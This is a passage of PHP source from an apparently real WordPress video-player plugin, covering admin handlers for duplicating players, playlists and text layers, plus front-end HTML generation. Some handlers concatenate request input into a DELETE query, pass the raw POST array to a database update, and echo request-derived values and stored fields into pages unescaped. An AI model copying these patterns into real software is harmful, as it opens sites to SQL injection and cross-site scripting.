			$safe_sql=$wpdb->prepare( "INSERT INTO ".$wpdb->prefix ."video_player_youtube_vimeo_players ( `name` ) SELECT `name` FROM (".$wpdb->prefix ."video_player_youtube_vimeo_players) WHERE id = %d",$_GET['duplicate_id'] );
			$wpdb->query($safe_sql);
			$playerid=$wpdb->insert_id;

			//settings
			$safe_sql=$wpdb->prepare( "INSERT INTO ".$wpdb->prefix ."video_player_youtube_vimeo_settings (`width`, `height`, `width100Proc`, `height100Proc`, `centerPlugin`, `skin`, `randomizeImages`, `firstImg`, `initialVolume`, `numberOfStripes`, `numberOfRows`, `numberOfColumns`, `defaultEffect`, `effectDuration`, `autoPlay`, `autoPlayFirstVideo`, `autoPlayNextVideo`, `loop`, `target`, `enableTouchScreen`, `borderWidth`, `borderColor`, `showCircleTimer`, `showCircleTimerIE8IE7`, `circleRadius`, `circleLineWidth`, `circleColor`, `circleAlpha`, `behindCircleColor`, `behindCircleAlpha`, `responsive`, `responsiveRelativeToBrowser`, `showAllControllers`, `showNavArrows`, `showOnInitNavArrows`, `autoHideNavArrows`, `showThumbs`, `playlistWidth`, `numberOfThumbsPerScreen`, `playlistRecordShowImg`, `playlistRecordShowTitle`, `playlistRecordShowDesc`, `playlistRecordHeight`, `playlistRecordPadding`, `playlistTitleFontSize`, `playlistTitleLineHeight`, `playlistDescFontSize`, `playlistDescLineHeight`, `playlistRecordBgOffColor`, `playlistRecordTitleOffColor`, `playlistRecordDescOffColor`, `playlistRecordBgOffImgOpacity`, `playlistRecordBgOnColor`, `playlistRecordTitleOnColor`, `playlistRecordDescOnColor`, `playlistRecordBgOnImgOpacity`, `playlistBgColor`, `playlistRecordTitleLimit`, `playlistRecordDescLimit`, `origThumbImgW`, `origThumbImgH`, `getYouTubeData` ) SELECT `width`, `height`, `width100Proc`, `height100Proc`, `centerPlugin`, `skin`, `randomizeImages`, `firstImg`, `initialVolume`, `numberOfStripes`, `numberOfRows`, `numberOfColumns`, `defaultEffect`, `effectDuration`, `autoPlay`, `autoPlayFirstVideo`, `autoPlayNextVideo`, `loop`, `target`, `enableTouchScreen`, `borderWidth`, `borderColor`, `showCircleTimer`, `showCircleTimerIE8IE7`, `circleRadius`, `circleLineWidth`, `circleColor`, `circleAlpha`, `behindCircleColor`, `behindCircleAlpha`, `responsive`, `responsiveRelativeToBrowser`, `showAllControllers`, `showNavArrows`, `showOnInitNavArrows`, `autoHideNavArrows`, `showThumbs`, `playlistWidth`, `numberOfThumbsPerScreen`, `playlistRecordShowImg`, `playlistRecordShowTitle`, `playlistRecordShowDesc`, `playlistRecordHeight`, `playlistRecordPadding`, `playlistTitleFontSize`, `playlistTitleLineHeight`, `playlistDescFontSize`, `playlistDescLineHeight`, `playlistRecordBgOffColor`, `playlistRecordTitleOffColor`, `playlistRecordDescOffColor`, `playlistRecordBgOffImgOpacity`, `playlistRecordBgOnColor`, `playlistRecordTitleOnColor`, `playlistRecordDescOnColor`, `playlistRecordBgOnImgOpacity`, `playlistBgColor`, `playlistRecordTitleLimit`, `playlistRecordDescLimit`, `origThumbImgW`, `origThumbImgH`, `getYouTubeData` FROM (".$wpdb->prefix ."video_player_youtube_vimeo_settings) WHERE id = %d",$_GET['duplicate_id'] );
			$wpdb->query($safe_sql);

			//playlist
			$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."video_player_youtube_vimeo_playlist) WHERE playerid = %d",$_GET['duplicate_id'] );
			$result = $wpdb->get_results($safe_sql,ARRAY_A);
			foreach ( $result as $row_playlist ) {
				$row_playlist=video_player_youtube_vimeo_unstrip_array($row_playlist);

				$safe_sql=$wpdb->prepare( "INSERT INTO ".$wpdb->prefix ."video_player_youtube_vimeo_playlist ( `playerid`, `img`, `data-bottom-thumb`, `data-title`, `data-desc`, `data-youtube`, `data-vimeo`, `data-transition`, `data-link`, `data-target`, `ord` ) SELECT ".$playerid.", `img`, `data-bottom-thumb`, `data-title`, `data-desc`, `data-youtube`, `data-vimeo`, `data-transition`, `data-link`, `data-target`, `ord` FROM (".$wpdb->prefix ."video_player_youtube_vimeo_playlist) WHERE id = %d",$row_playlist['id'] );
				$wpdb->query($safe_sql);
				$photoid=$wpdb->insert_id;

				//layers/texts
				$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."video_player_youtube_vimeo_texts) WHERE photoid = %d",$row_playlist['id'] );
				$result_texts = $wpdb->get_results($safe_sql,ARRAY_A);
				foreach ( $result_texts as $row_texts ) {
					$row_texts=video_player_youtube_vimeo_unstrip_array($row_texts);

					$safe_sql=$wpdb->prepare( "INSERT INTO ".$wpdb->prefix ."video_player_youtube_vimeo_texts (`photoid`, `content`, `data-initial-left`, `data-initial-top`, `data-initial-skew`, `data-initial-scale`, `data-final-left`, `data-final-top`, `data-final-skew`, `data-final-scale`, `data-duration`, `data-fade-start`, `data-delay`, `css`, `img_src`, `element-link`, `element-link-target`, `data-easing`, `data-exit-left`, `data-exit-top`, `data-exit-fade`, `data-exit-duration`, `data-exit-delay`, `data-exit-easing`, `data-exit-off`, `data-exit-skew`, `data-exit-scale`, `data-intermediate-left`, `data-intermediate-top`, `data-intermediate-duration`, `data-intermediate-easing`, `data-intermediate-delay`, `data-intermediate-skew`, `data-intermediate-scale`, `ord`) SELECT ".$photoid.", `content`, `data-initial-left`, `data-initial-top`, `data-initial-skew`, `data-initial-scale`, `data-final-left`, `data-final-top`, `data-final-skew`, `data-final-scale`, `data-duration`, `data-fade-start`, `data-delay`, `css`, `img_src`, `element-link`, `element-link-target`, `data-easing`, `data-exit-left`, `data-exit-top`, `data-exit-fade`, `data-exit-duration`, `data-exit-delay`, `data-exit-easing`, `data-exit-off`, `data-exit-skew`, `data-exit-scale`, `data-intermediate-left`, `data-intermediate-top`, `data-intermediate-duration`, `data-intermediate-easing`, `data-intermediate-delay`, `data-intermediate-skew`, `data-intermediate-scale`, `ord` FROM (".$wpdb->prefix ."video_player_youtube_vimeo_texts) WHERE id = %d",$row_texts['id'] );
					$wpdb->query($safe_sql);
				}
			}

	}

	$safe_sql="SELECT * FROM (".$wpdb->prefix ."video_player_youtube_vimeo_players) ORDER BY id";
	$result = $wpdb->get_results($safe_sql,ARRAY_A);
	include_once($video_player_youtube_vimeo_path . 'tpl/players.php');

}


//HTML content for Manage players - Add New
function video_player_youtube_vimeo_manage_players_add_new_page()
{
	global $wpdb;
	global $video_player_youtube_vimeo_messages;
	global $video_player_youtube_vimeo_path;

	if(array_key_exists('Submit', $_POST) && $_POST['Submit'] == 'Add New') {
		$errors_arr=array();
		if (empty($_POST['name']))
			$errors_arr[]=$video_player_youtube_vimeo_messages['empty_name'];

		if (count($errors_arr)) {
				include_once($video_player_youtube_vimeo_path . 'tpl/add_player.php'); ?>
				<div id="error" class="error"><p><?php echo implode("<br>", $errors_arr);?></p></div>
		  	<?php } else { // no errors
					$wpdb->insert(
						$wpdb->prefix . "video_player_youtube_vimeo_players",
						array(
							'name' => sanitize_text_field($_POST['name'])
						),
						array(
							'%s'
						)
					);
					//insert default Player Settings for this new Player
					video_player_youtube_vimeo_insert_settings_record($wpdb->insert_id);
					?>
						<div class="wrap">
							<div id="lbg_logo">
								<h2><?php esc_html_e('Manage Players - Add New Player', 'ytbvimeo-video' );?></h2>
				 			</div>
							<div id="message" class="updated"><p><?php esc_html_e($video_player_youtube_vimeo_messages['data_saved']);?></p><p><?php esc_html_e($video_player_youtube_vimeo_messages['generate_for_this_player']);?></p></div>
							<div>
								<p>&raquo; <a href="?page=YOUTUBE_VIMEO_VIDEO_PLAYER_Add_New"><?php esc_html_e('Add New (Player)', 'ytbvimeo-video' );?></a></p>
								<p>&raquo; <a href="?page=YOUTUBE_VIMEO_VIDEO_PLAYER_Manage_Players"><?php esc_html_e('Back to Manage Players', 'ytbvimeo-video' );?></a></p>
							</div>
						</div>
		  	<?php }
	} else {
		include_once($video_player_youtube_vimeo_path . 'tpl/add_player.php');
	}

}


//HTML content for playersettings
function video_player_youtube_vimeo_settings_page()
{
	global $wpdb;
	global $video_player_youtube_vimeo_messages;
	global $video_player_youtube_vimeo_path;

	if (isset($_GET['id']) && isset($_GET['name'])) {
		$_SESSION['xid']=$_GET['id'];
		$_SESSION['xname']=$_GET['name'];
	}

	if(array_key_exists('Submit', $_POST) && $_POST['Submit'] == 'Update Player Settings') {
		$_GET['xmlf']='';
		$except_arr=array('Submit','name','page_scroll_to_id_instances','_wp_http_referer','set_key_auth','_wpnonce');

			$wpdb->update(
				$wpdb->prefix .'video_player_youtube_vimeo_players',
				array(
				'name' => sanitize_text_field($_POST['name'])
				),
				array( 'id' => sanitize_text_field($_SESSION['xid']) )
			);
			$_SESSION['xname']=stripslashes($_POST['name']);


			foreach ($_POST as $key=>$val){
				if (in_array($key,$except_arr)) {
					unset($_POST[$key]);
				}
			}

			$wpdb->update(
				$wpdb->prefix .'video_player_youtube_vimeo_settings',
				$_POST,
				array( 'id' => sanitize_text_field($_SESSION['xid']) )
			);

			?>
			<div id="message" class="updated"><p><?php esc_html_e($video_player_youtube_vimeo_messages['data_saved']);?></p></div>
	<?php

	}

	$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."video_player_youtube_vimeo_settings) WHERE id = %d",$_SESSION['xid'] );
	$row = $wpdb->get_row($safe_sql,ARRAY_A);
	$row=video_player_youtube_vimeo_unstrip_array($row);
	$_POST = $row;
	$_POST=video_player_youtube_vimeo_unstrip_array($_POST);

	include_once($video_player_youtube_vimeo_path . 'tpl/settings_form.php');

}

function video_player_youtube_vimeo_playlist_page()
{
	global $wpdb;
	global $video_player_youtube_vimeo_messages;
	global $video_player_youtube_vimeo_path;

	if (isset($_GET['id']) && isset($_GET['name'])) {
		$_SESSION['xid']=$_GET['id'];
		$_SESSION['xname']=$_GET['name'];
	}


	if (array_key_exists('xmlf', $_GET) && $_GET['xmlf']=='add_playlist_record') {
		if(array_key_exists('Submit', $_POST) && $_POST['Submit'] == 'Add Record') {
			$errors_arr=array();

		if (count($errors_arr)) {
			include_once($video_player_youtube_vimeo_path . 'tpl/add_playlist_record.php'); ?>
			<div id="error" class="error"><p><?php echo implode("<br>", $errors_arr);?></p></div>
	  	<?php } else { // no upload errors
				$max_ord = 1+$wpdb->get_var( $wpdb->prepare( "SELECT max(ord) FROM ". $wpdb->prefix ."video_player_youtube_vimeo_playlist WHERE playerid = %d",$_SESSION['xid'] ) );

				$wpdb->insert(
					$wpdb->prefix . "video_player_youtube_vimeo_playlist",
					array(
						'playerid' => sanitize_text_field($_POST['playerid']),
						'img' => sanitize_text_field($_POST['img']),
						'data-bottom-thumb' => sanitize_text_field($_POST['data-bottom-thumb']),
						'data-title' => sanitize_text_field($_POST['data-title']),
						'data-desc' => sanitize_text_field($_POST['data-desc']),
						'data-youtube' => sanitize_text_field($_POST['data-youtube']),
						'data-vimeo' => sanitize_text_field($_POST['data-vimeo']),
						'data-transition' => sanitize_text_field($_POST['data-transition']),
						'data-link' => sanitize_text_field($_POST['data-link']),
						'data-target' => sanitize_text_field($_POST['data-target']),
						'ord' => sanitize_text_field($max_ord)
					),
					array(
						'%d',
						'%s',
						'%s',
						'%s',
						'%s',
						'%s',
						'%s',
						'%s',
						'%s',
						'%s',
						'%d'
					)
				);

	  			if (isset($_POST['setitfirst'])) {
					$sql_arr=array();
					$ord_start=$max_ord;
					$ord_stop=1;
					$elem_id=$wpdb->insert_id;
					$ord_direction='+1';

					$sql_arr[]=$wpdb->prepare( "UPDATE ".$wpdb->prefix."video_player_youtube_vimeo_playlist SET ord=ord+1  WHERE playerid = %d and ord>=".$ord_stop." and ord<".$ord_start, $_SESSION['xid']);
					$sql_arr[]=$wpdb->prepare( "UPDATE ".$wpdb->prefix."video_player_youtube_vimeo_playlist SET ord=%d WHERE id=%d", $ord_stop,$elem_id);

					foreach ($sql_arr as $sql)
						$wpdb->query($sql);
				}
				?>
					<div class="wrap">
						<div id="lbg_logo">
							<h2><?php esc_html_e('Playlist for Player:', 'ytbvimeo-video' );?> <span class="lbg_the_redb"><?php echo strip_tags($_SESSION['xname'])?> - <?php esc_html_e('ID', 'ytbvimeo-video' );?> #<?php echo strip_tags($_SESSION['xid'])?></span> - <?php esc_html_e('Add New', 'ytbvimeo-video' );?></h2>
			 			</div>
						<div id="message" class="updated"><p><?php esc_html_e($video_player_youtube_vimeo_messages['data_saved']);?></p></div>
						<div>
							<p>&raquo; <a href="?page=YOUTUBE_VIMEO_VIDEO_PLAYER_Playlist&xmlf=add_playlist_record"><?php esc_html_e('Add New', 'ytbvimeo-video' );?></a></p>
							<p>&raquo; <a href="?page=YOUTUBE_VIMEO_VIDEO_PLAYER_Playlist"><?php esc_html_e('Back to Playlist', 'ytbvimeo-video' );?></a></p>
						</div>
					</div>
	  	<?php }
		} else {
			include_once($video_player_youtube_vimeo_path . 'tpl/add_playlist_record.php');
		}

	} else {
		if (array_key_exists('duplicate_id', $_GET) && $_GET['duplicate_id']!='') {
			$max_ord = 1+$wpdb->get_var( $wpdb->prepare( "SELECT max(ord) FROM ". $wpdb->prefix ."video_player_youtube_vimeo_playlist WHERE playerid = %d",$_SESSION['xid'] ) );
			$safe_sql=$wpdb->prepare( "INSERT INTO ".$wpdb->prefix ."video_player_youtube_vimeo_playlist ( `playerid`, `img`, `data-bottom-thumb`, `data-title`, `data-desc`, `data-youtube`, `data-vimeo`, `data-transition`, `data-link`, `data-target`, `ord` ) SELECT `playerid`, `img`, `data-bottom-thumb`, `data-title`, `data-desc`, `data-youtube`, `data-vimeo`, `data-transition`, `data-link`, `data-target` ,".$max_ord." FROM (".$wpdb->prefix ."video_player_youtube_vimeo_playlist) WHERE id = %d",$_GET['duplicate_id'] );
			$wpdb->query($safe_sql);
$lastID=$wpdb->insert_id;

			$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."video_player_youtube_vimeo_texts) WHERE photoid = %d",$_GET['duplicate_id'] );
			$result = $wpdb->get_results($safe_sql,ARRAY_A);
			foreach ( $result as $row_playlist ) {
				$row_playlist=video_player_youtube_vimeo_unstrip_array($row_playlist);

				$safe_sql=$wpdb->prepare( "INSERT INTO ".$wpdb->prefix ."video_player_youtube_vimeo_texts (`photoid`, `content`, `data-initial-left`, `data-initial-top`, `data-initial-skew`, `data-initial-scale`, `data-final-left`, `data-final-top`, `data-final-skew`, `data-final-scale`, `data-duration`, `data-fade-start`, `data-delay`, `css`, `img_src`, `element-link`, `element-link-target`, `data-easing`, `data-exit-left`, `data-exit-top`, `data-exit-fade`, `data-exit-duration`, `data-exit-delay`, `data-exit-easing`, `data-exit-off`, `data-exit-skew`, `data-exit-scale`, `data-intermediate-left`, `data-intermediate-top`, `data-intermediate-duration`, `data-intermediate-easing`, `data-intermediate-delay`, `data-intermediate-skew`, `data-intermediate-scale`, `ord`) SELECT ".$lastID.", `content`, `data-initial-left`, `data-initial-top`, `data-initial-skew`, `data-initial-scale`, `data-final-left`, `data-final-top`, `data-final-skew`, `data-final-scale`, `data-duration`, `data-fade-start`, `data-delay`, `css`, `img_src`, `element-link`, `element-link-target`, `data-easing`, `data-exit-left`, `data-exit-top`, `data-exit-fade`, `data-exit-duration`, `data-exit-delay`, `data-exit-easing`, `data-exit-off`, `data-exit-skew`, `data-exit-scale`, `data-intermediate-left`, `data-intermediate-top`, `data-intermediate-duration`, `data-intermediate-easing`, `data-intermediate-delay`, `data-intermediate-skew`, `data-intermediate-scale`, `ord` FROM (".$wpdb->prefix ."video_player_youtube_vimeo_texts) WHERE id = %d",$row_playlist['id'] );
				$wpdb->query($safe_sql);
			}



			echo "<script>location.href='?page=YOUTUBE_VIMEO_VIDEO_PLAYER_Playlist&id=".$_SESSION['xid']."&name=".$_SESSION['xname']."'</script>";

		}

		$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."video_player_youtube_vimeo_playlist) WHERE playerid = %d ORDER BY ord",$_SESSION['xid'] );
		$result = $wpdb->get_results($safe_sql,ARRAY_A);

		include_once($video_player_youtube_vimeo_path . 'tpl/playlist.php');
	}
}



function video_player_youtube_vimeo_editElements_page()
{
	global $wpdb;
	global $general_param;
	global $video_player_youtube_vimeo_path;

	if (isset($_GET['id']) && isset($_GET['name'])) {
		$_SESSION['xid']=$_GET['id'];
		$_SESSION['xname']=$_GET['name'];
	}

	if (isset($_GET['deletealllayers']) && !array_key_exists('Submit', $_POST)) {
		$wpdb->query(
		"
		DELETE FROM ".$wpdb->prefix ."video_player_youtube_vimeo_texts
		WHERE photoid = ".$_GET['deletealllayers']."
		"
		);
	}

	$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."video_player_youtube_vimeo_playlist) WHERE id = %d",$_GET['playlistID'] );
	$row = $wpdb->get_row($safe_sql, ARRAY_A);

	$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."video_player_youtube_vimeo_texts) WHERE photoid = %d ORDER BY ord",$_GET['playlistID'] );
	$result_text = $wpdb->get_results($safe_sql,ARRAY_A);

	if ((array_key_exists('Submit', $_POST) && $_POST['Submit'] == 'Save All Changes') || (array_key_exists('duplicate_layer', $_SESSION) && $_SESSION['duplicate_layer'] !=0)) {
		foreach ( $result_text as $row_text ) {
			$textid=$row_text['id'];
			$wpdb->update(
				$wpdb->prefix .'video_player_youtube_vimeo_texts',
				array(
					'content' => sanitize_text_field($_POST['content'.$textid]),
					'css' => sanitize_text_field($_POST['css'.$textid]),
					'data-initial-left' => sanitize_text_field($_POST['data-initial-left'.$textid]),
					'data-initial-top' => sanitize_text_field($_POST['data-initial-top'.$textid]),
					'data-final-left' => sanitize_text_field($_POST['data-final-left'.$textid]),
					'data-final-top' => sanitize_text_field($_POST['data-final-top'.$textid]),
					'data-duration' => sanitize_text_field($_POST['data-duration'.$textid]),
					'data-fade-start' => sanitize_text_field($_POST['data-fade-start'.$textid]),
					'data-delay' => sanitize_text_field($_POST['data-delay'.$textid])
					),
				array( 'id' => sanitize_text_field($textid) ),
				array(
'%s',
'%s',
'%d',
'%d',
'%d',
'%d',
'%f',
'%d',
'%f'
	),
				array( '%d' )
			);
		}
			?>
	<?php
	}

	if (array_key_exists('duplicate_layer', $_SESSION) && $_SESSION['duplicate_layer']!=0) {
		$safe_sql=$wpdb->prepare( "SELECT `photoid` , `data-final-left` , `data-final-top` FROM (".$wpdb->prefix ."video_player_youtube_vimeo_texts) WHERE id = %d", $_SESSION['duplicate_layer']);
		$row_dupl = $wpdb->get_row($safe_sql,ARRAY_A);


		$new_final_left=$row_dupl['data-final-left']+10;
		$new_final_top=$row_dupl['data-final-top']+10;
		$photoid=$row_dupl['photoid'];
		$max_ord=1;

		$wpdb->query($wpdb->prepare("UPDATE ".$wpdb->prefix."video_player_youtube_vimeo_texts SET ord=ord+1 WHERE photoid = %d",$photoid));

		$safe_sql=$wpdb->prepare( "INSERT INTO ".$wpdb->prefix ."video_player_youtube_vimeo_texts (`photoid`, `content`, `data-initial-left`, `data-initial-top`, `data-initial-skew`, `data-initial-scale`, `data-final-left`, `data-final-top`, `data-final-skew`, `data-final-scale`, `data-duration`, `data-fade-start`, `data-delay`, `css`, `img_src`, `element-link`, `element-link-target`, `data-easing`, `data-exit-left`, `data-exit-top`, `data-exit-fade`, `data-exit-duration`, `data-exit-delay`, `data-exit-easing`, `data-exit-off`, `data-exit-skew`, `data-exit-scale`, `data-intermediate-left`, `data-intermediate-top`, `data-intermediate-duration`, `data-intermediate-easing`, `data-intermediate-delay`, `data-intermediate-skew`, `data-intermediate-scale`, `ord`) SELECT `photoid`, `content`, `data-initial-left`, `data-initial-top`, `data-initial-skew`, `data-initial-scale`, ".$new_final_left.", ".$new_final_top.", `data-final-skew`, `data-final-scale`, `data-duration`, `data-fade-start`, `data-delay`, `css`, `img_src`, `element-link`, `element-link-target`, `data-easing`, `data-exit-left`, `data-exit-top`, `data-exit-fade`, `data-exit-duration`, `data-exit-delay`, `data-exit-easing`, `data-exit-off`, `data-exit-skew`, `data-exit-scale`, `data-intermediate-left`, `data-intermediate-top`, `data-intermediate-duration`, `data-intermediate-easing`, `data-intermediate-delay`, `data-intermediate-skew`, `data-intermediate-scale`, ".$max_ord." FROM (".$wpdb->prefix ."video_player_youtube_vimeo_texts) WHERE id = %d",$_SESSION['duplicate_layer'] );
		$wpdb->query($safe_sql);
		$lastID=$wpdb->insert_id;


		$_SESSION['duplicate_layer']=0;
	}

	//get slider settings
	$safe_sql=$wpdb->prepare( "SELECT width,height,playlistWidth,borderWidth FROM (".$wpdb->prefix ."video_player_youtube_vimeo_settings) WHERE id = %d",$_SESSION['xid'] );
	$row_settings = $wpdb->get_row($safe_sql, ARRAY_A);

	//get latest text parameters
	$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."video_player_youtube_vimeo_texts) WHERE photoid = %d ORDER BY ord",$_GET['playlistID'] );
	$result_text = $wpdb->get_results($safe_sql,ARRAY_A);

	$safe_sql="SELECT css_styles FROM (".$wpdb->prefix ."video_player_youtube_vimeo_css_definitions)";
	$row_css = $wpdb->get_row($safe_sql, ARRAY_A);

	include_once($video_player_youtube_vimeo_path . 'tpl/playlist_elements_over_image.php');

}





function video_player_youtube_vimeo_help_page()
{
	global $video_player_youtube_vimeo_path;
	include_once($video_player_youtube_vimeo_path . 'tpl/help.php');
}

function video_player_youtube_vimeo_generate_video_player_youtube_vimeo($playerID) {
	global $wpdb;

	$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."video_player_youtube_vimeo_settings) WHERE id = %d",$playerID );
	$row = $wpdb->get_row($safe_sql,ARRAY_A);
	$row=video_player_youtube_vimeo_unstrip_array($row);

	$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."video_player_youtube_vimeo_playlist) WHERE playerid = %d ORDER BY ord",$playerID );
	$result = $wpdb->get_results($safe_sql,ARRAY_A);
	$playlist_str='';
	$text_str='';
	foreach ( $result as $row_playlist ) {
		$row_playlist=video_player_youtube_vimeo_unstrip_array($row_playlist);
		$img_aux='';
		$text_id='';
		if ($row_playlist["img"]!='') {
			$img_aux='<img src="'.$row_playlist["img"].'" alt="'.$row_playlist["data-title"].'" />';


			//get texts
			$safe_sql=$wpdb->prepare( "SELECT * FROM (".$wpdb->prefix ."video_player_youtube_vimeo_texts) WHERE photoid = %d ORDER BY ord",$row_playlist['id'] );
			$result_text = $wpdb->get_results($safe_sql,ARRAY_A);

			if ($wpdb->num_rows) { // i have texts
				$text_id='#youtubeVimeoWithPlaylist_photoText'.$row_playlist['id'];


				$text_str.='<div id="youtubeVimeoWithPlaylist_photoText'.$row_playlist['id'].'" class="youtubeVimeoWithPlaylist_texts">';
				foreach ( $result_text as $row_text ) {
					$row_text=video_player_youtube_vimeo_unstrip_array($row_text);
					$zindex_aux=100-$row_text['ord'];
					$content_aux=$row_text['content'];
					$link_start='';
					if ($row_text['img_src']!='') {
						if (strpos($row_text['img_src'], 'wp-content',9)===false)
							list($width, $height, $type, $attr) = getimagesize($row_text['img_src']);
						else
							list($width, $height, $type, $attr) = getimagesize( ABSPATH.substr($row_text['img_src'],strpos($row_text['img_src'], 'wp-content',9)) );
						$content_aux='<img src="'.$row_text['img_src'].'" width="'.$width.'" height="'.$height.'" style="width:'.$width.'px; height:'.$height.'px; border:0;" alt="'.$row_text['content'].'" />';
					}
					$link_start='';
					$link_end='';
					if ($row_text['element-link']!='') {
						$link_start='<a href="'.$row_text['element-link'].'" target="'.$row_text['element-link-target'].'">';
						$link_end='</a>';
					}
					$exit_param='';
					if ($row_text['data-exit-duration']!=0) {
						$exit_param='  data-exit-left="'.$row_text['data-exit-left'].'" data-exit-top="'.$row_text['data-exit-top'].'" data-exit-fade="'.$row_text['data-exit-fade'].'" data-exit-duration="'.$row_text['data-exit-duration'].'" data-exit-delay="'.$row_text['data-exit-delay'].'" data-exit-easing="'.$row_text['data-exit-easing'].'" data-exit-off="'.$row_text['data-exit-off'].'"';
					}
					$intermediate_move_param='';
					if ($row_text['data-intermediate-duration']!=0) {
						$intermediate_move_param=' data-intermediate-left="'.$row_text['data-intermediate-left'].'" data-intermediate-top="'.$row_text['data-intermediate-top'].'" data-intermediate-skew="'.$row_text['data-intermediate-skew'].'" data-intermediate-scale="'.$row_text['data-intermediate-scale'].'" data-intermediate-duration="'.$row_text['data-intermediate-duration'].'" data-intermediate-delay="'.$row_text['data-intermediate-delay'].'" data-intermediate-easing="'.$row_text['data-intermediate-easing'].'"';
					}

					$text_str.='<div class="youtubeVimeoWithPlaylist_text_line '.$row_text['css'].'" data-initial-left="'.$row_text['data-initial-left'].'" data-initial-top="'.$row_text['data-initial-top'].'" data-initial-skew="'.$row_text['data-initial-skew'].'" data-initial-scale="'.$row_text['data-initial-scale'].'" data-final-left="'.$row_text['data-final-left'].'" data-final-top="'.$row_text['data-final-top'].'" data-final-skew="'.$row_text['data-final-skew'].'" data-final-scale="'.$row_text['data-final-scale'].'" data-duration="'.$row_text['data-duration'].'" data-fade-start="'.$row_text['data-fade-start'].'" data-delay="'.$row_text['data-delay'].'" data-easing="'.$row_text['data-easing'].'" '.$exit_param.' '.$intermediate_move_param.' style="z-index:'.$zindex_aux.';">'.$link_start.$content_aux.$link_end.'</div>';
				}
				$text_str.='</div>';
			}
		}

		$playlist_str.='<li data-text-id="'.$text_id.'" data-bottom-thumb="'.$row_playlist['data-bottom-thumb'].'" data-title="'.$row_playlist['data-title'].'" data-desc="'.$row_playlist['data-desc'].'" data-youtube="'.$row_playlist['data-youtube'].'" data-vimeo="'.$row_playlist['data-vimeo'].'" data-transition="'.$row_playlist['data-transition'].'" data-link="'.$row_playlist['data-link'].'" data-target="'.$row_playlist['data-target'].'" >'.$img_aux.'</li>';

	}





	$str_to_return = '<script>
		jQuery(function() {
			jQuery("#youtubeVimeoWithPlaylist_'.$row["id"].'").youtubeVimeoWithPlaylist({
				skin:"'.$row["skin"].'",
				responsive:'.$row["responsive"].',
				responsiveRelativeToBrowser:'.((is_admin())?'false':$row["responsiveRelativeToBrowser"]).',
				width:'.$row["width"].',
				height:'.$row["height"].',
				width100Proc:'.$row["width100Proc"].',
				height100Proc:'.$row["height100Proc"].',
				centerPlugin:'.$row["centerPlugin"].',
				randomizeImages:'.$row["randomizeImages"].',
				firstImg:'.$row["firstImg"].',
				initialVolume:'.$row["initialVolume"].',
				numberOfStripes:'.$row["numberOfStripes"].',
				numberOfRows:'.$row["numberOfRows"].',
				numberOfColumns:'.$row["numberOfColumns"].',
				defaultEffect:"'.$row["defaultEffect"].'",
				effectDuration:'.$row["effectDuration"].',
				autoPlay:'.$row["autoPlay"].',
				autoPlayFirstVideo:'.$row["autoPlayFirstVideo"].',
				autoPlayNextVideo:'.$row["autoPlayNextVideo"].',
				loop:'.$row["loop"].',
				target:"'.$row["target"].'",
				enableTouchScreen:'.$row["enableTouchScreen"].',
				borderWidth:'.$row["borderWidth"].',
				borderColor:"#'.$row["borderColor"].'",
				showCircleTimer:'.$row["showCircleTimer"].',
				circleRadius:'.$row["circleRadius"].',
				circleLineWidth:'.$row["circleLineWidth"].',
				circleColor:"#'.$row["circleColor"].'",
				circleAlpha:'.$row["circleAlpha"].',
				behindCircleColor:"#'.$row["behindCircleColor"].'",
				behindCircleAlpha:'.$row["behindCircleAlpha"].',
				showAllControllers:'.$row["showAllControllers"].',
				showNavArrows:'.$row["showNavArrows"].',
				showOnInitNavArrows:'.$row["showOnInitNavArrows"].',
				autoHideNavArrows:'.$row["autoHideNavArrows"].',
				showThumbs:'.$row["showThumbs"].',
				playlistWidth:'.$row["playlistWidth"].',
				numberOfThumbsPerScreen:'.$row["numberOfThumbsPerScreen"].',
				playlistRecordShowImg:'.$row["playlistRecordShowImg"].',
				playlistRecordShowTitle:'.$row["playlistRecordShowTitle"].',
				playlistRecordShowDesc:'.$row["playlistRecordShowDesc"].',
				playlistRecordHeight:'.$row["playlistRecordHeight"].',
				playlistRecordPadding:'.$row["playlistRecordPadding"].',
				playlistTitleFontSize:'.$row["playlistTitleFontSize"].',
				playlistTitleLineHeight:'.$row["playlistTitleLineHeight"].',
				playlistDescFontSize:'.$row["playlistDescFontSize"].',
				playlistDescLineHeight:'.$row["playlistDescLineHeight"].',
				playlistRecordBgOffColor:"#'.$row["playlistRecordBgOffColor"].'",
				playlistRecordTitleOffColor:"#'.$row["playlistRecordTitleOffColor"].'",
				playlistRecordDescOffColor:"#'.$row["playlistRecordDescOffColor"].'",
				playlistRecordBgOffImgOpacity:'.$row["playlistRecordBgOffImgOpacity"].',
				playlistRecordBgOnColor:"#'.$row["playlistRecordBgOnColor"].'",
				playlistRecordTitleOnColor:"#'.$row["playlistRecordTitleOnColor"].'",
				playlistRecordDescOnColor:"#'.$row["playlistRecordDescOnColor"].'",
				playlistRecordBgOnImgOpacity:'.$row["playlistRecordBgOnImgOpacity"].',
				playlistBgColor:"#'.$row["playlistBgColor"].'",
				playlistRecordTitleLimit:'.$row["playlistRecordTitleLimit"].',
				playlistRecordDescLimit:'.$row["playlistRecordDescLimit"].',
				getYouTubeData:'.$row["getYouTubeData"].',
				pathToAjaxFiles:"'.plugins_url("", __FILE__).'/video_player_youtube_vimeo/",
				origThumbImgW:'.$row["origThumbImgW"].',
				origThumbImgH:'.$row["origThumbImgH"].'
			});
		});
	</script>
            <div id="youtubeVimeoWithPlaylist_'.$row["id"].'" style="display:none;"><ul class="youtubeVimeoWithPlaylist_list">'.$playlist_str.'</ul>'.$text_str.'</div>';

    return str_replace("\r\n", '', $str_to_return);
}


function video_player_youtube_vimeo_shortcode($atts, $content=null) {
	global $wpdb;

	shortcode_atts( array('settings_id'=>''), $atts);
	if ($atts['settings_id']=='')
		$atts['settings_id']=1;

